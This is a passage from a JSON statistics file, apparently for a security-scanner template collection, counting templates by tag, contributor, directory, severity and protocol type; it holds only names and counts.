},{"name":"hortonworks","count":1},{"name":"cgi","count":1},{"name":"leanix","count":1},{"name":"opensns","count":1},{"name":"announcekit","count":1},{"name":"javascript","count":1},{"name":"maccmsv10","count":1},{"name":"adb","count":1},{"name":"terraform","count":1},{"name":"circontrorl","count":1},{"name":"xdcms","count":1},{"name":"duomicms","count":1},{"name":"eyou","count":1},{"name":"crm","count":1},{"name":"beanstalk","count":1},{"name":"panos","count":1},{"name":"resourcespace","count":1},{"name":"openstack","count":1},{"name":"panasonic","count":1},{"name":"route","count":1},{"name":"redmine","count":1},{"name":"nette","count":1},{"name":"digitalocean","count":1},{"name":"zte","count":1},{"name":"spotify","count":1},{"name":"nuxeo","count":1},{"name":"stripe","count":1},{"name":"default","count":1},{"name":"extractor","count":1},{"name":"natemail","count":1},{"name":"cherokee","count":1},{"name":"office365","count":1},{"name":"pendo","count":1},{"name":"gespage","count":1},{"name":"nearby","count":1},{"name":"flink","count":1},{"name":"dahua","count":1},{"name":"asana","count":1},{"name":"asus","count":1},{"name":"traefik","count":1},{"name":"cvnd","count":1},{"name":"octoprint","count":1},{"name":"shopxo","count":1},{"name":"sco","count":1},{"name":"phpfusion","count":1},{"name":"circontrol","count":1},{"name":"postmessage","count":1},{"name":"mdb","count":1},{"name":"webex","count":1},{"name":"placeos","count":1},{"name":"apiman","count":1},{"name":"setup","count":1},{"name":"tensorflow","count":1},{"name":"tensorboard","count":1},{"name":"elasticsearch","count":1},{"name":"mariadb","count":1},{"name":"socomec","count":1},{"name":"monitorix","count":1},{"name":"nedi","count":1},{"name":"visualtools","count":1},{"name":"jfrog","count":1},{"name":"wakatime","count":1},{"name":"esmtp","count":1},{"name":"apos","count":1},{"name":"woocomernce","count":1},{"name":"nomad","count":1},{"name":"redwood","count":1},{"name":"apigee","count":1},{"name":"webui","count":1},{"name":"metabase","count":1},{"name":"expressjs","count":1},{"name":"appweb","count":1},{"name":"sarg","count":1},{"name":"olivetti","count":1},{"name":"st","count":1},{"name":"shoretel","count":1},{"name":"landray","count":1},{"name":"mpsec","count":1},{"name":"loqate","count":1},{"name":"burp","count":1},{"name":"shiro","count":1},{"name":"discord","count":1},{"name":"uwsgi","count":1},{"name":"bingmaps","count":1},{"name":"geddy","count":1},{"name":"tectuus","count":1},{"name":"fastapi","count":1},{"name":"sendgrid","count":1},{"name":"avalanche","count":1},{"name":"gitea","count":1},{"name":"locations","count":1},{"name":"labtech","count":1},{"name":"sast","count":1},{"name":"wiki","count":1},{"name":"comodo","count":1},{"name":"optiLink","count":1},{"name":"dwsync","count":1},{"name":"glances","count":1},{"name":"smartsense","count":1},{"name":"imap","count":1},{"name":"panabit","count":1},{"name":"graphql","count":1},{"name":"whm","count":1},{"name":"lg-nas","count":1},{"name":"phpshowtime","count":1},{"name":"syslog","count":1},{"name":"basic-auth","count":1},{"name":"pacsone","count":1},{"name":"xmpp","count":1},{"name":"ntopng","count":1},{"name":"mailgun","count":1},{"name":"webftp","count":1},{"name":"hiboss","count":1},{"name":"tjws","count":1},{"name":"motorola","count":1},{"name":"nps","count":1},{"name":"pyramid","count":1},{"name":"argussurveillance","count":1},{"name":"cve202","count":1},{"name":"b2evolution","count":1},{"name":"embedthis","count":1},{"name":"etherpad","count":1},{"name":"fortigate","count":1},{"name":"bullwark","count":1},{"name":"clusterengine","count":1},{"name":"majordomo2","count":1},{"name":"kyan","count":1},{"name":"clockwork","count":1},{"name":"haproxy","count":1},{"name":"myucms","count":1},{"name":"sugarcrm","count":1},{"name":"erp-nc","count":1},{"name":"sql","count":1},{"name":"phpfastcache","count":1},{"name":"remkon","count":1},{"name":"contentkeeper","count":1},{"name":"floc","count":1},{"name":"skywalking","count":1},{"name":"codeigniter","count":1},{"name":"fortiweb","count":1},{"name":"adiscon","count":1},{"name":"wazuh","count":1},{"name":"viewlinc","count":1},{"name":"tika","count":1},{"name":"graph","count":1},{"name":"rmc","count":1},{"name":"clave","count":1},{"name":"calendarix","count":1},{"name":"webmodule-ee","count":1},{"name":"nifi","count":1},{"name":"tapestry","count":1},{"name":"zend","count":1},{"name":"zzzcms","count":1},{"name":"nerdgraph","count":1},{"name":"dom","count":1},{"name":"mongo","count":1},{"name":"jquery","count":1},{"name":"billquick","count":1},{"name":"flexbe","count":1},{"name":"cobub","count":1},{"name":"clink-office","count":1},{"name":"twitter","count":1},{"name":"wifisky","count":1},{"name":"dompdf","count":1},{"name":"place","count":1}],"authors":[{"name":"dhiyaneshdk","count":300},{"name":"daffainfo","count":290},{"name":"pikpikcu","count":281},{"name":"pdteam","count":202},{"name":"geeknik","count":166},{"name":"dwisiswant0","count":152},{"name":"gy741","count":83},{"name":"pussycat0x","count":76},{"name":"princechaddha","count":67},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":58},{"name":"gaurang","count":42},{"name":"philippedelteil","count":31},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"meme-lord","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"johnk3r","count":6},{"name":"divya_mudgal","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"rootxharsh","count":5},{"name":"elsfa7110","count":5},{"name":"iamnoooob","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"lu4nx","count":5},{"name":"e_schultze_","count":4},{"name":"wisnupramoedya","count":4},{"name":"github.com/its0x08","count":4},{"name":"incogbyte","count":4},{"name":"tess","count":4},{"name":"nodauf","count":4},{"name":"thomas_from_offensity","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"idealphase","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"sullo","count":3},{"name":"_generic_human_","count":3},{"name":"sushantkamble","count":3},{"name":"vsh00t","count":3},{"name":"shine","count":3},{"name":"me9187","count":3},{"name":"f1tz","count":3},{"name":"skeltavik","count":3},{"name":"dudez","count":3},{"name":"shifacyclewala","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"johnjhacking","count":3},{"name":"0w4ys","count":3},{"name":"z3bd","count":3},{"name":"impramodsargar","count":3},{"name":"dheerajmadhukar","count":2},{"name":"fabaff","count":2},{"name":"koti2","count":2},{"name":"kiblyn11","count":2},{"name":"bernardofsr","count":2},{"name":"davidmckennirey","count":2},{"name":"alifathi-h1","count":2},{"name":"0xelkomy","count":2},{"name":"foulenzer","count":2},{"name":"arcc","count":2},{"name":"w4cky_","count":2},{"name":"ree4pwn","count":2},{"name":"bing0o","count":2},{"name":"swissky","count":2},{"name":"martincodes-de","count":2},{"name":"0xsapra","count":2},{"name":"random-robbie","count":2},{"name":"zomsop82","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"parth","count":2},{"name":"0xprial","count":2},{"name":"huowuzhao","count":2},{"name":"r3naissance","count":2},{"name":"lark-lab","count":2},{"name":"udit_thakkur","count":2},{"name":"sy3omda","count":2},{"name":"gevakun","count":2},{"name":"cocxanh","count":2},{"name":"0xsmiley","count":2},{"name":"vavkamil","count":2},{"name":"moritz nentwig","count":2},{"name":"manas_harsh","count":2},{"name":"pxmme1337","count":2},{"name":"afaq","count":2},{"name":"mohammedsaneem","count":2},{"name":"whoever","count":2},{"name":"ehsahil","count":2},{"name":"convisoappsec","count":2},{"name":"hetroublemakr","count":2},{"name":"hahwul","count":2},{"name":"g4l1t0","count":2},{"name":"gal nagli","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"x1m_martijn","count":2},{"name":"r12w4n","count":2},{"name":"amsda","count":2},{"name":"dahse89","count":2},{"name":"bp0lr","count":2},{"name":"randomrobbie","count":2},{"name":"joeldeleep","count":2},{"name":"lotusdll","count":2},{"name":"socketz","count":2},{"name":"0xrudra","count":2},{"name":"nkxxkn","count":2},{"name":"0xcrypto","count":2},{"name":"bsysop","count":2},{"name":"kaizensecurity","count":1},{"name":"furkansenan","count":1},{"name":"nerrorsec","count":1},{"name":"sshell","count":1},{"name":"ajaysenr","count":1},{"name":"bad5ect0r","count":1},{"name":"raesene","count":1},{"name":"mah3sec_","count":1},{"name":"florianmaak","count":1},{"name":"taielab","count":1},{"name":"chron0x","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akash.c","count":1},{"name":"sickwell","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"omarkurt","count":1},{"name":"clarkvoss","count":1},{"name":"makyotox","count":1},{"name":"apt-mirror","count":1},{"name":"elouhi","count":1},{"name":"wabafet","count":1},{"name":"b4uh0lz","count":1},{"name":"thevillagehacker","count":1},{"name":"fmunozs","count":1},{"name":"borna nematzadeh","count":1},{"name":"regala_","count":1},{"name":"evolutionsec","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"zandros0","count":1},{"name":"alperenkesk","count":1},{"name":"dawid-czarnecki","count":1},{"name":"retr02332","count":1},{"name":"thebinitghimire","count":1},{"name":"elmahdi","count":1},{"name":"0xd0ff9","count":1},{"name":"remonsec","count":1},{"name":"elder tao","count":1},{"name":"ringo","count":1},{"name":"_darrenmartyn","count":1},{"name":"xstp","count":1},{"name":"andirrahmani1","count":1},{"name":"smaranchand","count":1},{"name":"philippdelteil","count":1},{"name":"_c0wb0y_","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"rodnt","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"sbani","count":1},{"name":"_harleo","count":1},{"name":"knassar702","count":1},{"name":"udyz","count":1},{"name":"its0x08","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"@dwisiswant0","count":1},{"name":"soyelmago","count":1},{"name":"jeya seelan","count":1},{"name":"manuelbua","count":1},{"name":"c3l3si4n","count":1},{"name":"hakluke","count":1},{"name":"willd96","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"0xteles","count":1},{"name":"becivells","count":1},{"name":"pdp","count":1},{"name":"pratik khalane","count":1},{"name":"x6263","count":1},{"name":"oscarintherocks","count":1},{"name":"patralos","count":1},{"name":"push4d","count":1},{"name":"jteles","count":1},{"name":"lark lab","count":1},{"name":"ipanda","count":1},{"name":"alph4byt3","count":1},{"name":"petruknisme","count":1},{"name":"exploitation","count":1},{"name":"berkdusunur","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"schniggie","count":1},{"name":"kurohost","count":1},{"name":"0h1in9e","count":1},{"name":"akshansh","count":1},{"name":"rojanrijal","count":1},{"name":"juicypotato1","count":1},{"name":"th3.d1p4k","count":1},{"name":"thezakman","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"vzamanillo","count":1},{"name":"nvn1729","count":1},{"name":"jrolf","count":1},{"name":"52971","count":1},{"name":"blckraven","count":1},{"name":"yashanand155","count":1},{"name":"ilovebinbash","count":1},{"name":"harshinsecurity","count":1},{"name":"infosecsanyam","count":1},{"name":"@ofjaaah","count":1},{"name":"sicksec","count":1},{"name":"s1r1u5_","count":1},{"name":"deena","count":1},{"name":"tim_koopmans","count":1},{"name":"droberson","count":1},{"name":"kareemse1im","count":1},{"name":"absshax","count":1},{"name":"ahmetpergamum","count":1},{"name":"mesaglio","count":1},{"name":"zhenwarx","count":1},{"name":"undefl0w","count":1},{"name":"0xrod","count":1},{"name":"yavolo","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"co0nan","count":1},{"name":"notsoevilweasel","count":1},{"name":"adrianmf","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"affix","count":1},{"name":"alex","count":1},{"name":"tirtha_mandal","count":1},{"name":"lethargynavigator","count":1},{"name":"micha3lb3n","count":1},{"name":"orpheus","count":1},{"name":"brabbit10","count":1},{"name":"luskabol","count":1},{"name":"j33n1k4","count":1},{"name":"shelld3v","count":1},{"name":"whynotke","count":1},{"name":"bjhulst","count":1},{"name":"hanlaomo","count":1},{"name":"noamrathaus","count":1},{"name":"ahmed sherif","count":1},{"name":"b0rn2r00t","count":1},{"name":"qlkwej","count":1},{"name":"revblock","count":1},{"name":"b0yd","count":1},{"name":"pudsec","count":1},{"name":"naglinagli","count":1},{"name":"un-fmunozs","count":1},{"name":"kabirsuda","count":1},{"name":"ooooooo_q","count":1},{"name":"toufik airane","count":1},{"name":"_0xf4n9x_","count":1},{"name":"shifacyclewla","count":1},{"name":"izn0u","count":1},{"name":"yashgoti","count":1},{"name":"retr0","count":1},{"name":"sec_hawk","count":1},{"name":"mubassirpatel","count":1},{"name":"gboddin","count":1},{"name":"0xtavian","count":1},{"name":"geraldino2","count":1},{"name":"nytr0gen","count":1},{"name":"igibanez","count":1},{"name":"rotemreiss","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"0ut0fb4nd","count":1},{"name":"d0rkerdevil","count":1},{"name":"luci","count":1},{"name":"aresx","count":1},{"name":"andysvints","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"streetofhackerr007","count":1},{"name":"fopina","count":1},{"name":"iampritam","count":1},{"name":"intx0x80","count":1},{"name":"mhdsamx","count":1},{"name":"ohlinge","count":1},{"name":"ldionmarcil","count":1},{"name":"forgedhallpass","count":1},{"name":"shreyapohekar","count":1},{"name":"flag007","count":1},{"name":"defr0ggy","count":1},{"name":"majidmc2","count":1},{"name":"bolli95","count":1},{"name":"daviey","count":1},{"name":"kre80r","count":1},{"name":"mass0ma","count":1}],"directory":[{"name":"cves","count":847},{"name":"vulnerabilities","count":332},{"name":"exposed-panels","count":286},{"name":"technologies","count":203},{"name":"exposures","count":199},{"name":"misconfiguration","count":143},{"name":"token-spray","count":83},{"name":"takeovers","count":66},{"name":"default-logins","count":60},{"name":"file","count":51},{"name":"workflows","count":38},{"name":"iot","count":36},{"name":"network","count":33},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"cnvd","count":10},{"name":"fuzzing","count":10},{"name":"headless","count":5}],"severity":[{"name":"info","count":806},{"name":"high","count":655},{"name":"medium","count":483},{"name":"critical","count":299},{"name":"low","count":157}],"types":[{"name":"http","count":2286},{"name":"file","count":51},{"name":"network","count":46},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":852},{"name":"lfi","count":350},{"name":"panel","count":295},{"name":"xss","count":266},{"name":"wordpress","count":262},{"name":"exposure","count":250},{"name":"rce","count":221},{"name":"tech","count":204},{"name":"wp-plugin","count":180},{"name":"cve2020","count":166},{"name":"cve2021","count":166},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"config","count":99},{"name":"cve2019","count":99},{"name":"token-spray","count":98},{"name":"cve2018","count":93},{"name":"iot","count":81},{"name":"apache","count":75},{"name":"oast","count":74},{"name":"takeover","count":70},{"name":"default-login","count":69},{"name":"token","count":68},{"name":"file","count":57},{"name":"cve2017","count":52},{"name":"unauth","count":50},{"name":"network","count":44},{"name":"ssrf","count":44},{"name":"","count":42},{"name":"sqli","count":41},{"name":"cve2016","count":39},{"name":"redirect","count":38},{"name":"oracle","count":37},{"name":"logs","count":35},{"name":"cve2015","count":30},{"name":"misconfig","count":30},{"name":"google","count":30},{"name":"jira","count":29},{"name":"atlassian","count":29},{"name":"cisco","count":28},{"name":"cve2014","count":27},{"name":"listing","count":27},{"name":"auth-bypass","count":25},{"name":"generic","count":24},{"name":"disclosure","count":22},{"name":"misc","count":22},{"name":"router","count":22},{"name":"aem","count":19},{"name":"cve2012","count":18},{"name":"debug","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"cve2011","count":15},{"name":"wp-theme","count":15},{"name":"weblogic","count":15},{"name":"php","count":15},{"name":"aws","count":15},{"name":"fuzz","count":15},{"name":"devops","count":15},{"name":"login","count":14},{"name":"struts","count":14},{"name":"cve2009","count":14},{"name":"deserialization","count":14},{"name":"android","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"dlink","count":13},{"name":"dns","count":13},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"intrusive","count":11},{"name":"xxe","count":11},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"dell","count":10},{"name":"hp","count":10},{"name":"vmware","count":9},{"name":"gitlab","count":9},{"name":"ftp","count":9},{"name":"ibm","count":9},{"name":"kubernetes","count":9},{"name":"rails","count":9},{"name":"microsoft","count":8},{"name":"backup","count":8},{"name":"cve2008","count":8},{"name":"cnvd","count":8},{"name":"ruijie","count":8},{"name":"fastjson","count":8},{"name":"airflow","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"django","count":7},{"name":"files","count":7},{"name":"camera","count":7},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"jetty","count":6},{"name":"fileupload","count":6},{"name":"lucee","count":6},{"name":"drupal","count":6},{"name":"api","count":6},{"name":"phpmyadmin","count":6},{"name":"docker","count":6},{"name":"nodejs","count":6},{"name":"sitecore","count":6},{"name":"rconfig","count":6},{"name":"solr","count":6},{"name":"laravel","count":6},{"name":"citrix","count":6},{"name":"prometheus","count":6},{"name":"printer","count":5},{"name":"dedecms","count":5},{"name":"headless","count":5},{"name":"tomcat","count":5},{"name":"windows","count":5},{"name":"thinkphp","count":5},{"name":"crlf","count":5},{"name":"symfony","count":5},{"name":"jolokia","count":5},{"name":"iis","count":5},{"name":"circarlife","count":5},{"name":"java","count":5},{"name":"ssti","count":5},{"name":"wso2","count":5},{"name":"npm","count":4},{"name":"samsung","count":4},{"name":"firebase","count":4},{"name":"webserver","count":4},{"name":"maps","count":4},{"name":"firmware","count":4},{"name":"strapi","count":4},{"name":"enum","count":4},{"name":"bigip","count":4},{"name":"symantec","count":4},{"name":"thinkcmf","count":4},{"name":"amazon","count":4},{"name":"zabbix","count":4},{"name":"buffalo","count":4},{"name":"asp","count":4},{"name":"proxy","count":4},{"name":"zimbra","count":4},{"name":"fatpipe","count":4},{"name":"glpi","count":4},{"name":"keycloak","count":4},{"name":"moodle","count":4},{"name":"resin","count":4},{"name":"vpn","count":4},{"name":"rfi","count":4},{"name":"microstrategy","count":4},{"name":"artifactory","count":4},{"name":"elastic","count":4},{"name":"magmi","count":4},{"name":"solarwinds","count":4},{"name":"grafana","count":4},{"name":"slack","count":4},{"name":"traversal","count":4},{"name":"git","count":4},{"name":"hongdian","count":4},{"name":"exchange","count":4},{"name":"smtp","count":3},{"name":"terramaster","count":3},{"name":"backdoor","count":3},{"name":"zhiyuan","count":3},{"name":"lfr","count":3},{"name":"tikiwiki","count":3},{"name":"mongodb","count":3},{"name":"cloud","count":3},{"name":"minio","count":3},{"name":"openam","count":3},{"name":"linkerd","count":3},{"name":"github","count":3},{"name":"nosqli","count":3},{"name":"itop","count":3},{"name":"cve2007","count":3},{"name":"targa","count":3},{"name":"openssh","count":3},{"name":"sql","count":3},{"name":"movable","count":3},{"name":"fanruan","count":3},{"name":"nexus","count":3},{"name":"log","count":3},{"name":"r-seenet","count":3},{"name":"exposures","count":3},{"name":"oa","count":3},{"name":"kevinlab","count":3},{"name":"nacos","count":3},{"name":"sonicwall","count":3},{"name":"telerik","count":3},{"name":"cacti","count":3},{"name":"vbulletin","count":3},{"name":"jellyfin","count":3},{"name":"opensis","count":3},{"name":"hoteldruid","count":3},{"name":"azure","count":3},{"name":"caucho","count":3},{"name":"druid","count":3},{"name":"jeesns","count":3},{"name":"kibana","count":3},{"name":"ssh","count":3},{"name":"injection","count":3},{"name":"cves","count":3},{"name":"httpd","count":3},{"name":"search","count":3},{"name":"fpd","count":3},{"name":"kafka","count":3},{"name":"springcloud","count":3},{"name":"mail","count":3},{"name":"lansweeper","count":3},{"name":"node","count":3},{"name":"bitrix","count":3},{"name":"ofbiz","count":3},{"name":"ebs","count":3},{"name":"aruba","count":2},{"name":"aviatrix","count":2},{"name":"oauth","count":2},{"name":"hikvision","count":2},{"name":"jsf","count":2},{"name":"lotus","count":2},{"name":"zeroshell","count":2},{"name":"hashicorp","count":2},{"name":"embed","count":2},{"name":"redis","count":2},{"name":"maian","count":2},{"name":"pega","count":2},{"name":"nextjs","count":2},{"name":"chamilo","count":2},{"name":"hpe","count":2},{"name":"aspose","count":2},{"name":"axis","count":2},{"name":"trixbox","count":2},{"name":"ucmdb","count":2},{"name":"wordfence","count":2},{"name":"axis2","count":2},{"name":"sharepoint","count":2},{"name":"netis","count":2},{"name":"fortinet","count":2},{"name":"prestashop","count":2},{"name":"icewarp","count":2},{"name":"hasura","count":2},{"name":"ilo","count":2},{"name":"kentico","count":2},{"name":"avantfax","count":2},{"name":"rstudio","count":2},{"name":"huawei","count":2},{"name":"linux","count":2},{"name":"ec2","count":2},{"name":"places","count":2},{"name":"igs","count":2},{"name":"qihang","count":2},{"name":"liferay","count":2},{"name":"globalprotect","count":2},{"name":"favicon","count":2},{"name":"rancher","count":2},{"name":"prtg","count":2},{"name":"hostheader-injection","count":2},{"name":"upload","count":2},{"name":"akkadian","count":2},{"name":"db","count":2},{"name":"text","count":2},{"name":"chiyu","count":2},{"name":"saltstack","count":2},{"name":"leak","count":2},{"name":"rockmongo","count":2},{"name":"getsimple","count":2},{"name":"nextcloud","count":2},{"name":"natshell","count":2},{"name":"jeedom","count":2},{"name":"showdoc","count":2},{"name":"smb","count":2},{"name":"phpstorm","count":2},{"name":"chyrp","count":2},{"name":"python","count":2},{"name":"cache","count":2},{"name":"idea","count":2},{"name":"bruteforce","count":2},{"name":"status","count":2},{"name":"jboss","count":2},{"name":"idrac","count":2},{"name":"dolibarr","count":2},{"name":"bitly","count":2},{"name":"odoo","count":2},{"name":"openvpn","count":2},{"name":"geowebserver","count":2},{"name":"netsweeper","count":2},{"name":"ecology","count":2},{"name":"paloalto","count":2},{"name":"heroku","count":2},{"name":"adminer","count":2},{"name":"activemq","count":2},{"name":"vrealize","count":2},{"name":"openfire","count":2},{"name":"grav","count":2},{"name":"mailchimp","count":2},{"name":"qcubed","count":2},{"name":"yapi","count":2},{"name":"harbor","count":2},{"name":"plesk","count":2},{"name":"s3","count":2},{"name":"yii","count":2},{"name":"totemomail","count":2},{"name":"storage","count":2},{"name":"backups","count":2},{"name":"forcepoint","count":2},{"name":"spark","count":2},{"name":"justwriting","count":2},{"name":"frp","count":2},{"name":"linkedin","count":2},{"name":"spring","count":2},{"name":"wuzhicms","count":2},{"name":"ruby","count":2},{"name":"emerge","count":2},{"name":"cve2005","count":2},{"name":"jetbrains","count":2},{"name":"middleware","count":2},{"name":"splunk","count":2},{"name":"glassfish","count":2},{"name":"bucket","count":2},{"name":"nagios","count":2},{"name":"openemr","count":2},{"name":"kong","count":2},{"name":"dos","count":2},{"name":"sonarqube","count":2},{"name":"xxljob","count":2},{"name":"akamai","count":2},{"name":"vcenter","count":2},{"name":"tidb","count":2},{"name":"mida","count":2},{"name":"electron","count":2},{"name":"seeyon","count":2},{"name":"ecoa","count":2},{"name":"hjtcloud","count":2},{"name":"waf","count":2},{"name":"service","count":2},{"name":"mcafee","count":2},{"name":"webcam","count":2},{"name":"commax","count":2},{"name":"fortios","count":2},{"name":"horde","count":2},{"name":"bypass","count":2},{"name":"couchdb","count":2},{"name":"myfactory","count":2},{"name":"payara","count":2},{"name":"phpcollab","count":2},{"name":"guacamole","count":2},{"name":"flir","count":2},{"name":"rocketchat","count":2},{"name":"shellshock","count":2},{"name":"voipmonitor","count":2},{"name":"sar2html","count":1},{"name":"woocomernce","count":1},{"name":"autocomplete","count":1},{"name":"soar","count":1},{"name":"idemia","count":1},{"name":"olivetti","count":1},{"name":"circontrorl","count":1},{"name":"tamronos","count":1},{"name":"pyramid","count":1},{"name":"dotclear","count":1},{"name":"mongoshake","count":1},{"name":"announcekit","count":1},{"name":"jfrog","count":1},{"name":"timesheet","count":1},{"name":"gotmls","count":1},{"name":"74cms","count":1},{"name":"sarg","count":1},{"name":"gunicorn","count":1},{"name":"solman","count":1},{"name":"netlify","count":1},{"name":"postmessage","count":1},{"name":"fiori","count":1},{"name":"nomad","count":1},{"name":"asus","count":1},{"name":"instagram","count":1},{"name":"faraday","count":1},{"name":"parentlink","count":1},{"name":"k8s","count":1},{"name":"contentkeeper","count":1},{"name":"powercreator","count":1},{"name":"blackboard","count":1},{"name":"appveyor","count":1},{"name":"sterling","count":1},{"name":"iucn","count":1},{"name":"episerver","count":1},{"name":"javafaces","count":1},{"name":"urlscan","count":1},{"name":"chevereto","count":1},{"name":"drone","count":1},{"name":"artica","count":1},{"name":"netrc","count":1},{"name":"linksys","count":1},{"name":"fuelcms","count":1},{"name":"miscrsoft","count":1},{"name":"mantisbt","count":1},{"name":"eprints","count":1},{"name":"postgres","count":1},{"name":"bash","count":1},{"name":"geddy","count":1},{"name":"tensorflow","count":1},{"name":"cscart","count":1},{"name":"speed","count":1},{"name":"graphql","count":1},{"name":"default","count":1},{"name":"xdcms","count":1},{"name":"geutebruck","count":1},{"name":"square","count":1},{"name":"xunchi","count":1},{"name":"graphite","count":1},{"name":"novnc","count":1},{"name":"okta","count":1},{"name":"optimizely","count":1},{"name":"wildfly","count":1},{"name":"rhymix","count":1},{"name":"vsftpd","count":1},{"name":"hiawatha","count":1},{"name":"lanproxy","count":1},{"name":"servicenow","count":1},{"name":"openweather","count":1},{"name":"couchbase","count":1},{"name":"tenda","count":1},{"name":"shoretel","count":1},{"name":"achecker","count":1},{"name":"owasp","count":1},{"name":"database","count":1},{"name":"comodo","count":1},{"name":"ems","count":1},{"name":"ns","count":1},{"name":"kindeditor","count":1},{"name":"bigbluebutton","count":1},{"name":"tink","count":1},{"name":"wooyun","count":1},{"name":"k8","count":1},{"name":"spectracom","count":1},{"name":"turbocrm","count":1},{"name":"tcexam","count":1},{"name":"fortigates","count":1},{"name":"vidyo","count":1},{"name":"discourse","count":1},{"name":"redmine","count":1},{"name":"xiuno","count":1},{"name":"dotnetnuke","count":1},{"name":"cyberoam","count":1},{"name":"cse","count":1},{"name":"api-manager","count":1},{"name":"panos","count":1},{"name":"scimono","count":1},{"name":"chinaunicom","count":1},{"name":"glowroot","count":1},{"name":"huijietong","count":1},{"name":"xampp","count":1},{"name":"clink-office","count":1},{"name":"redcap","count":1},{"name":"dvwa","count":1},{"name":"thecatapi","count":1},{"name":"smi","count":1},{"name":"postmark","count":1},{"name":"phpfastcache","count":1},{"name":"auth","count":1},{"name":"craftcms","count":1},{"name":"expressjs","count":1},{"name":"synnefo","count":1},{"name":"basic-auth","count":1},{"name":"esmtp","count":1},{"name":"webftp","count":1},{"name":"netdata","count":1},{"name":"rabbitmq","count":1},{"name":"openerp","count":1},{"name":"nexusdb","count":1},{"name":"kerbynet","count":1},{"name":"erp-nc","count":1},{"name":"jenkin","count":1},{"name":"emby","count":1},{"name":"zm","count":1},{"name":"visualstudio","count":1},{"name":"seacms","count":1},{"name":"exacqvision","count":1},{"name":"iptime","count":1},{"name":"qvisdvr","count":1},{"name":"rmi","count":1},{"name":"tika","count":1},{"name":"pcoip","count":1},{"name":"cockpit","count":1},{"name":"twitter","count":1},{"name":"empirecms","count":1},{"name":"buttercms","count":1},{"name":"hubspot","count":1},{"name":"lg-nas","count":1},{"name":"h3c-imc","count":1},{"name":"playable","count":1},{"name":"vercel","count":1},{"name":"xml","count":1},{"name":"exponentcms","count":1},{"name":"clockwork","count":1},{"name":"virustotal","count":1},{"name":"wondercms","count":1},{"name":"octobercms","count":1},{"name":"sco","count":1},{"name":"lutron","count":1},{"name":"manager","count":1},{"name":"visionhub","count":1},{"name":"hadoop","count":1},{"name":"iconfinder","count":1},{"name":"webmodule-ee","count":1},{"name":"gstorage","count":1},{"name":"embedthis","count":1},{"name":"sugarcrm","count":1},{"name":"dvr","count":1},{"name":"svn","count":1},{"name":"tensorboard","count":1},{"name":"cherokee","count":1},{"name":"memcached","count":1},{"name":"expn","count":1},{"name":"panabit","count":1},{"name":"rubedo","count":1},{"name":"sourcebans","count":1},{"name":"eyelock","count":1},{"name":"jmx","count":1},{"name":"sqlite","count":1},{"name":"cgi","count":1},{"name":"solarlog","count":1},{"name":"graylog","count":1},{"name":"digitalocean","count":1},{"name":"sentry","count":1},{"name":"pmb","count":1},{"name":"bingmaps","count":1},{"name":"openstack","count":1},{"name":"perl","count":1},{"name":"triconsole","count":1},{"name":"place","count":1},{"name":"aspnuke","count":1},{"name":"dom","count":1},{"name":"codemeter","count":1},{"name":"nordex","count":1},{"name":"htmli","count":1},{"name":"key","count":1},{"name":"jabber","count":1},{"name":"ewebs","count":1},{"name":"webex","count":1},{"name":"ecom","count":1},{"name":"octoprint","count":1},{"name":"tapestry","count":1},{"name":"redhat","count":1},{"name":"metabase","count":1},{"name":"mod-proxy","count":1},{"name":"actuator","count":1},{"name":"fontawesome","count":1},{"name":"jaspersoft","count":1},{"name":"b2evolution","count":1},{"name":"jitsi","count":1},{"name":"centos","count":1},{"name":"webctrl","count":1},{"name":"mediumish","count":1},{"name":"o